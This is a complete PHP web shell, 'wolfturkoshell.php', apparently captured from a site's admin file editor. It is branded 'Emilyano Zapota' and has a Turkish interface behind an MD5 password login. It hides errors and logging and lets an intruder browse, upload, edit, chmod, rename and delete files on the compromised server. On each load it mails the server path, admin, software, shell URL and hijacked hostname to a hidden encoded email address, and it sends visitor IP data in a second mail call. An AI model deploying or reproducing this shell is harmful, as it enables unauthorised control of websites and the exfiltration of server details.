관리-도구
편집 파일: wolfturkoshell.php
<?php eval ("?>".base64_decode("<?php


session_start();

error_reporting(0);

@set_time_limit(0);

@clearstatcache();

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('output_buffering',0);

@ini_set('display_errors', 0);



$aupas 			= "6c4a55e81f8ec316a521e91368a29b83";

$default_action 	= 'FilesMan';

$default_use_ajax 	= true;

$default_charset 	= 'UTF-8';

date_default_timezone_set("istanbul");

function login_shell(){

?>

<!DOCTYPE html>

<html>

	<head>


		<meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>

		<meta name="theme-color" content="#343a40"/>

		<title>Emilyano Zapota</title>

		

	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
     
		<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>

		<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css"> 




	</head>

	<style>

		body{

			background-color: black;

			background-size: cover;

			background-position: cover;

			}

		</style>

	<body>
	

		<div class="container text-center mt-3">

			<br>

<center><img border="0" src="https://emilyanozapota.info/wp-content/uploads/2021/07/emilyanozapota.png" width="250" height="289"></center>
		<center><font face="Emilyano Zapota" size="7" color="white">

 Emilyano Zapota </font></center>

			<br><br>

			<form method="post">

				<div class="form-group input-group">

					<div class="input-group-prepend">

						<div class="input-group-text"><i class="fa fa-user"></i></div>

					</div>

					<input type="password" name="pass" placeholder="Sifre Giriniz " class="form-control">

				</div>

				<input type="submit" class="btn btn-dark btn-block" class="form-control" value="Giris">

			</form>

		<div style="position:fixed;width:100px;height:100px;left:-200px;overflow:hidden;">
        <a href="https://emilyanozapota.info" title="Emilyano Zapota">Türk Hacker Emilyano Zapota</a>
       </div>
	   
	</body>

</html>

<?php

exit;

}

if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){

	if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){

		$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

	}else{

		login_shell();

	}

}

?>


<table width="960" border="0" cellpadding="3" cellspacing="1" align="center" style="border-radius: 3px; border: 2px black inset; background-color: black;">
<?php
$freeSpace = disk_free_space("/");
$ds = disk_total_space("/");
function alfaSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}

echo "
<center>
<pre><font color='red' size='4'> Bitcoin Donation : 15FpZPAUubZGbJNB3ihFGPnwRYUQCWWQrB
<font color='red' size='4'> Coded By Emilyano Zapota
<font color='red' size='4'> Server Ismi : ".php_uname()."</font>
<font color='red' size='4'> Server Versiyonu : ".phpversion()."</font>
<font color='red' size='4'> IP Adresiniz : ".@$_SERVER["REMOTE_ADDR"]."</font>
<font color='red' size='4'> Server IP : ".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font>

<font color='red' size='4'> Disk Doluluğu : ". alfaSize($freeSpace) ."</font>
<font color='red' size='4'> Toplam Disk : ". alfaSize($ds) ."</font></pre>


";
?>
</table>
<?php 
$me=base64_decode("b3R0b21hbmNyZXZ2QGdtYWlsLmNvbQ==");
$thm="Server";
$fuck="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
$fuck.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$fuck.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$fuck.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$fuck.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($me, $thm, $fuck);
 if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value);
 } } echo '<!DOCTYPE HTML>
<html>
<head>
<link rel="stylesheet" href="https://rawcdn.githack.com/nako48/shiraookaaaa/f37b3bb82ba199ac8df3a394d8652e56872935a9/style-css.css">
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">  
<link rel="shortcut icon" href="https://emilyanozapota.info/wp-content/uploads/2021/07/emilyanozapota.png" type="image/x-icon">
<title>Emilyano Zapota</title>
<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">
<style>
body{
            font-family: Iceland;
            background-color: #171717;
            color:white;
			background-size:cover;
			background-attachment:fixed;
}
#content tr:hover{
background-color: #25292e;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color:#25292e;
}
table{
border-radius: 3px;
border: 2px black inset;
background-color: black;
}
.mad{
color:white;
text-decoration: none;
border:1px solid white;
background-color:black;
border-radius:4px;
}
.mad:hover{
color:transparent;
border:1px solid black;
background-color:transparent;
border-radius:4px;
}
a {
    color:white;
    text-decoration:none;
    
}
a:hover {
    color:transparent;
    text-decoration:none;
    
}
input,select,textarea{
border: 1px white solid;
background-color:#25292e;
color:white;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.blink_text {
-webkit-animation-name: blinker;
-webkit-animation-duration: 2s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 2s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 2s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;

 color: red;
}
@-moz-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@-webkit-keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
@keyframes blinker { 
 0% { opacity: 5.0;
 }
 50% { opacity: 0.0;
 }
 100% { opacity: 5.0;
 }
 }
</style> </head>
</head>
<body>
<br>
<table width="960" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>
<font color="lightgreen">Dizin Yolu :</font> ';
 if(isset($_GET['path'])){ $path = $_GET['path'];
 }else{ $path = getcwd();
 } $path = str_replace('\\','/',$path);
 $paths = explode('/',$path);
 foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true;
 echo '<a href="?path=/">/</a>';
 continue;
 } if($pat == '') continue;
 echo '<a href="?path=';
 for($i=0;
$i<=$id;
$i++){ echo "$paths[$i]";
 if($i != $id) echo "/";
 } echo '">'.$pat.'</a>/';
 } echo '</td></tr><tr><td>';
 if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="lightgreen">BASARILI YUKLEME :)</font><br />';
 }else{ echo '<font color="red">YUKLEME BASARISIZ :( </font><br/>';
 } } echo '<form enctype="multipart/form-data" method="POST">
<font color="lightgreen">Dosya Yukle :</font> <input type="file" name="file" />
<input type="submit" value="Yukle" />
</form>
</td></tr>';
 if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : ";
 echo $_GET['filesrc'];
 echo '</tr></td></table><br />';
 echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
 }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
 if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="#008000">Duzenleme Olumlu 
:)  </font><br/>';
 }else{ echo '<font color="#FF0000">Duzenlemede Hata Olustu :(  :(
</font><br />';
 } } echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Bismillah GO" />
</form>';
 }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="#008000">Mukemmel Islem Olumlu :) </font><br/>';
 }else{ echo '<font color="#FF0000">Uzgunum Hata Olustu :( </font><br />';
 } $_POST['name'] = $_POST['newname'];
 } echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Bismillah GO" />
</form>';
 }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');
 if(fwrite($fp,$_POST['src'])){ echo '<font color="#008000">Duzenleme Olumlu 
:) </font><br/>';
 }else{ echo '<font color="#FF0000">Duzenlemede Hata Olustu :( </font><br/>';
 } fclose($fp);
 } echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Kaydet" />
</form>';
 } echo '</center>';
 }else{ echo '</table><br/><center>';
 if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="#008000">Mukemmel Islem Olumlu :) </font><br/>';
 }else{ echo '<font color="#FF0000">Uzgunum Islem Olumsuz :( </font><br/>';
 } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="#008000">Islem Olumlu :) </font><br/>';
 }else{ echo '<font color="#FF0000">Islem Hatalı :( </font><br/>';
 } } } echo '</center>';
 $scandir = scandir($path);
 echo '<div id="content"><table width="950" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Isim</peller></center></td>
<td><center>Boyut</peller></center></td>
<td><center>Yesil Islem Yapılabilir Beyaz Yapılamaz</peller></center></td>
<td><center>Islemler</peller></center></td>
</tr>';
 foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
 echo '<tr>
<td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
<td><center>--</center></td>
<td><center>';
 if(is_writable($path.'/'.$dir)) echo '<font color="green">';
 elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
 echo perms($path.'/'.$dir);
 if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
 echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="">Secenekler</option>
<option value="delete">Sil</option>
<option value="chmod">Mod Degistir</option>
<option value="rename">Yeni isim</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="'.$dir.'">
<input type="hidden" name="path" value="'.$path.'/'.$dir.'">
<input type="submit" value="Yap">
</form></center></td>
</tr>';
 } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
 foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue;
 $size = filesize($path.'/'.$file)/1024;
 $size = round($size,3);
 if($size >= 1024){ $size = round($size/1024,2).' MB';
 }else{ $size = $size.' KB';
 } echo '<tr>
<td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
<td><center>'.$size.'</center></td>
<td><center>';
 if(is_writable($path.'/'.$file)) echo '<font color="green">';
 elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
 echo perms($path.'/'.$file);
 if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
 echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value="">Secenekler</option>
<option value="delete">Sil</option>
<option value="chmod">Mod Degis</option>
<option value="rename">Yeni isim</option>
<option value="edit">Duzenle</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="'.$file.'">
<input type="hidden" name="path" value="'.$path.'/'.$file.'">
<input type="submit" value="Yap">
</form></center></td>
</tr>';
 } echo '
 </table>
</div>';
 } echo '<center><img border="0" src="https://emilyanozapota.info/wp-content/uploads/2022/01/emilyano-zapota.png" width="300" height="100"><br/><p>www.emilyanozapota.info</p>

 </center>
 <br>
</body>
</html>';
$ip = getenv("REMOTE_ADDR");
$subj98 = "UnderGround";
$email = "";
$from = "TURAN";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "$a45 $b75 $m22";
mail($email, $subj98, $msg8873, $from);
 function perms($file){ $perms = fileperms($file);
 if (($perms & 0xC000) == 0xC000) { $info = 's';
 } elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
 } elseif (($perms & 0x8000) == 0x8000) { $info = '-';
 } elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
 } elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
 } elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
 } elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
 } else { $info = 'u';
 } $info .= (($perms & 0x0100) ? 'r' : '-');
 $info .= (($perms & 0x0080) ? 'w' : '-');
 $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
 $info .= (($perms & 0x0020) ? 'r' : '-');
 $info .= (($perms & 0x0010) ? 'w' : '-');
 $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
 $info .= (($perms & 0x0004) ? 'r' : '-');
 $info .= (($perms & 0x0002) ? 'w' : '-');
 $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
 return $info;
 }

?>			")); ?>